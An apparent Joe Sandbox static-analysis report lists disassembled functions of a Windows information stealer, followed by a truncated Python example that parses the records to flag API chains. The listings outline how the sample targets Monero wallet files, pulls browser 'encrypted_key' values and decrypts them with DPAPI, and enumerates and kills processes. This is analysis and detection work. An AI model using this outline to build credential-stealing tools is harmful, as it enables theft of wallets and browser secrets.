                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CAA11
                              • lstrlen.KERNEL32(00000000,00000000), ref: 004CAB2F
                              • lstrlen.KERNEL32(00000000), ref: 004CADEC
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • DeleteFileA.KERNEL32(00000000), ref: 004CAE73
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 762c61fab260f71ef29c4c556e5b98e82d702a4ef6ee199917b5e0ecea8b261f
                              • Instruction ID: daa5b4c8c8f85bed815f27e3e86fd8e1aa4ee3cdd877a123509e0e938e986f72
                              • Opcode Fuzzy Hash: 762c61fab260f71ef29c4c556e5b98e82d702a4ef6ee199917b5e0ecea8b261f
                              • Instruction Fuzzy Hash: 62E10E729100089BCB04EBA5DCB6EEE7339AF14304F50855FF15672291EE387A5DCB6A
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CD581
                              • lstrlen.KERNEL32(00000000), ref: 004CD798
                              • lstrlen.KERNEL32(00000000), ref: 004CD7AC
                              • DeleteFileA.KERNEL32(00000000), ref: 004CD82B
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: d69d5ac15df4fcb813b5adbf299065b60a904480c06f31727f3302c4fa667278
                              • Instruction ID: e17aace51fbd60dbacd3e0a93b3c289570045e115479b1caa83523eba70dddd0
                              • Opcode Fuzzy Hash: d69d5ac15df4fcb813b5adbf299065b60a904480c06f31727f3302c4fa667278
                              • Instruction Fuzzy Hash: 2E9145729101089BCB04FBA5DC76EEE7379AF14304F50856FF11662291EF387A19CB6A
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CD901
                              • lstrlen.KERNEL32(00000000), ref: 004CDA9F
                              • lstrlen.KERNEL32(00000000), ref: 004CDAB3
                              • DeleteFileA.KERNEL32(00000000), ref: 004CDB32
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: d5712488d7720929168d11257ab01740f5f7562783773ddcabf9036a8f6c7c6a
                              • Instruction ID: 915ccb390ca2f891278f882344c36feadcfe0aa9f5590b6915c3d1b42a3bf155
                              • Opcode Fuzzy Hash: d5712488d7720929168d11257ab01740f5f7562783773ddcabf9036a8f6c7c6a
                              • Instruction Fuzzy Hash: CA8144729201089BCB04FBA5DCB6EEE7379AF14304F40455FF14662295EF387A19CB6A
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction ID: fb01effc07933d18586452425437f0876c0cbd2fd9f7ef29d4a85362dd17e17b
                              • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction Fuzzy Hash: B451A172900206AFEB298F54D849BBABBB4FF41314F24453DED0997691E731ED50DB90
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004CA664
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: @$v10$v20
                              • API String ID: 2746078483-278772428
                              • Opcode ID: f8b022e8f7b9140e01a71dfa7b522b0eeb1087194bd670d80f94497e60dda0f9
                              • Instruction ID: 32fa11eb69a5f2352dbcae6529e23db6cce2697988b0539015170598d2cc851c
                              • Opcode Fuzzy Hash: f8b022e8f7b9140e01a71dfa7b522b0eeb1087194bd670d80f94497e60dda0f9
                              • Instruction Fuzzy Hash: 0051693461020CAFDB14DFA5CDA6FED73B5BF44308F00811EE90A5B295DB78AA15CB5A
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,004E1678,004E0D93), ref: 004CF64C
                              • lstrlen.KERNEL32(00000000), ref: 004CF66B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 2e4ed3aec9daf43288e5c88f61bc5d83d90eb23c6a9468866648c80d99632293
                              • Instruction ID: 9f35d707e95876ef7840b601b775ebd669e51eec5886749c7f60d20f72399159
                              • Opcode Fuzzy Hash: 2e4ed3aec9daf43288e5c88f61bc5d83d90eb23c6a9468866648c80d99632293
                              • Instruction Fuzzy Hash: C0515E729101089BCB04FBA1DCA6EED7379AF54304F00852FF50667295EE386A1DCB6A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 4cb3e50b55359962cf0f79e171d2f766904f90a528678740d6ec13ebc0f7f266
                              • Instruction ID: 0705c08d768275fb06b309cd0acd23d2a7d408e32b82619a2ca6c361fffb3371
                              • Opcode Fuzzy Hash: 4cb3e50b55359962cf0f79e171d2f766904f90a528678740d6ec13ebc0f7f266
                              • Instruction Fuzzy Hash: 554172B1D101099BCF04EFA5D865AEEB779AF14305F00801FF51576390EBB8AA45CF9A
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004CA489
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA23F
                                • Part of subcall function 004CA210: LocalAlloc.KERNEL32(00000040,?,?,?,004C4F3E,00000000,?), ref: 004CA251
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA27A
                                • Part of subcall function 004CA210: LocalFree.KERNEL32(?,?,?,?,004C4F3E,00000000,?), ref: 004CA28F
                                • Part of subcall function 004CA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004CA2D4
                                • Part of subcall function 004CA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 004CA2F3
                                • Part of subcall function 004CA2B0: LocalFree.KERNEL32(?), ref: 004CA323
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 513aed0420a0584920c244a5dffebeffcf7217755d8801329f6abf68d99e77c6
                              • Instruction ID: cf23acb3afb1543cd77f82c3cd17a781f36f30b2546d2eda92302ba8084411f6
                              • Opcode Fuzzy Hash: 513aed0420a0584920c244a5dffebeffcf7217755d8801329f6abf68d99e77c6
                              • Instruction Fuzzy Hash: 563150BAD0110CABCB44DBA4DC45FEFB3B8AB58308F44855EE901A3241E7389A14CB66
                              APIs
                              • memset.MSVCRT ref: 004D967B
                                • Part of subcall function 004D8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004D96AE,00000000), ref: 004D8EEB
                                • Part of subcall function 004D8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 004D8EF2
                                • Part of subcall function 004D8EE0: wsprintfW.USER32 ref: 004D8F08
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004D973B
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D9759
                              • CloseHandle.KERNEL32(00000000), ref: 004D9766
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 639846f47fb6b2d67198af0f54293c218d7bf5f890c39a3590d52eb2c5af63fc
                              • Instruction ID: 88d649b705584e8b7e29de43285917dc2652e076b89e697e175605cd8b6df1ee
                              • Opcode Fuzzy Hash: 639846f47fb6b2d67198af0f54293c218d7bf5f890c39a3590d52eb2c5af63fc
                              • Instruction Fuzzy Hash: 4A315A71E10208EBDB14DFE0CD59BEDB3B9BB44700F10845AF606AB284DB786E49CB59
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004E05BF), ref: 004D885A
                              • Process32First.KERNEL32(?,00000128), ref: 004D886E
                              • Process32Next.KERNEL32(?,00000128), ref: 004D8883
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • CloseHandle.KERNEL32(?), ref: 004D88F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 6949a52ea3ad82e294acb8923d84d8d666e506927f518bbf53c71851cdd34688
                              • Instruction ID: a7e09c638558bcaef452aa8ae0165a59b89b34c13e45e26d2f87e75e179e21ab
                              • Opcode Fuzzy Hash: 6949a52ea3ad82e294acb8923d84d8d666e506927f518bbf53c71851cdd34688
                              • Instruction Fuzzy Hash: 77314F71911118ABCB24EF96CC65FEEB778FB45704F10419FF10AA22A0DB386A45CFA5
                              APIs
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0053FE13
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0053FE2C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value___vcrt_
                              • String ID:
                              • API String ID: 1426506684-0
                              • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction ID: 793e6b7b1b12c5b0850b3e851841690a76e792d6b80ca47ff006f26dc6fb26c0
                              • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction Fuzzy Hash: BC01B132509B22AEF67426B45CCD9A63F98FB417B9F30473AF21A801F2EF514C85A244
                              APIs
                              • __getptd.LIBCMT ref: 004DCA7E
                                • Part of subcall function 004DC2A0: __amsg_exit.LIBCMT ref: 004DC2B0
                              • __getptd.LIBCMT ref: 004DCA95
                              • __amsg_exit.LIBCMT ref: 004DCAA3
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004DCAC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 637a0b263e86d0f66b36f5735a2b213dfb1cdd3d21d423f3fdbf992d299ab1fe
                              • Instruction ID: 9118e42ae27afc73943ad828877ca11e171699a2bdc09d94d04a62fc3e82ed86
                              • Opcode Fuzzy Hash: 637a0b263e86d0f66b36f5735a2b213dfb1cdd3d21d423f3fdbf992d299ab1fe
                              • Instruction Fuzzy Hash: A3F06232944316DBD620FBAA589674E73A0AF00718F11014FF404963D2DB6C5941D6DD
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Catch
                              • String ID: MOC$RCC
                              • API String ID: 78271584-2084237596
                              • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction ID: 3822924616a77a6c1585da1f1055ed3713055d0851c6b43fd6bcaf8701f56630
                              • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction Fuzzy Hash: 59415871900209AFCF16DF98D885AEEBFB5FF48308F289099FA04A7251D3359A50DF50
                              APIs
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D51CA
                              • lstrcat.KERNEL32(?,004E1058), ref: 004D51E7
                              • lstrcat.KERNEL32(?,012A8F78), ref: 004D51FB
                              • lstrcat.KERNEL32(?,004E105C), ref: 004D520D
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4B7C
                                • Part of subcall function 004D4B60: FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
                                • Part of subcall function 004D4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
                                • Part of subcall function 004D4B60: FindClose.KERNEL32(000000FF), ref: 004D4DE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                               • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: b9639b68c9465897730ab12ce60dc4c6c1a3d0c9f34389cac88a2ec25a7266de
                              • Instruction ID: 81eefceb34853eca86aa31017110c1f6362e165b129976f5c70c81af684d63ba
                              • Opcode Fuzzy Hash: b9639b68c9465897730ab12ce60dc4c6c1a3d0c9f34389cac88a2ec25a7266de
                              • Instruction Fuzzy Hash: EF212B76900208A7CB54EB70EC52FED333CAB94300F00855FB59656291EE7CA6C9CB99
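The function records above list each resolved call as one bullet: API name, module, the printed argument literals ("?" where the value was not recovered), the call-site address after "ref:", and a "Part of subcall function" prefix when the call happens inside a callee. The Python below is an added example, not code from the Joe Sandbox report or its tooling: it parses bullets of that shape and checks one record for the two API chains the records on this page show, the Toolhelp32 process walk (the lstrcpy/Process32First/Process32Next record) and the SHGetFolderPathA plus FindFirstFileA/FindNextFileA directory walk. The regular expression, the chain table and the PROCS_RECORD sample (constructed from that record's API ID, with made-up addresses) are this example's own assumptions; FILES_RECORD copies the bullets of the lstrcat/FindFirstFileA record as printed on this page.

```python
"""Parse the "APIs" bullets of Joe Sandbox function records and flag API chains.

Added example for this report page; the regex, the ApiCall layout and the chain
table are this example's own assumptions about the listing format, not Joe
Sandbox code.
"""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" bullet, in the three shapes the listing uses:
#   • lstrcat.KERNEL32(?,004E1058), ref: 004D51E7
#   • wsprintfA.USER32 ref: 004D4B7C
#   • Part of subcall function 004D4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str                  # name as printed, e.g. "FindFirstFileA"
    module: str               # e.g. "KERNEL32"
    args: tuple[str, ...]     # argument literals as printed; "?" means not recovered
    ref: int                  # address of the call site
    subcall: Optional[int]    # callee address when the call sits in a subcall, else None

    @property
    def base(self) -> str:
        """Name without the A/W suffix, so FindFirstFileA and FindFirstFileW compare equal."""
        return self.api[:-1] if len(self.api) > 3 and self.api[-1] in "AW" else self.api


# Behaviour chains: every base name must occur in one record (direct calls plus
# subcalls, the same aggregation the record's "API ID" line reflects).
CHAINS = {
    "process enumeration via Toolhelp32":
        {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "file enumeration under a shell folder":
        {"SHGetFolderPath", "FindFirstFile", "FindNextFile"},
}


def parse_record(text: str) -> list[ApiCall]:
    """Return the API calls of one function record; lines that are not API
    bullets (headings such as "APIs" or "Strings") are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] is not None else ()
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
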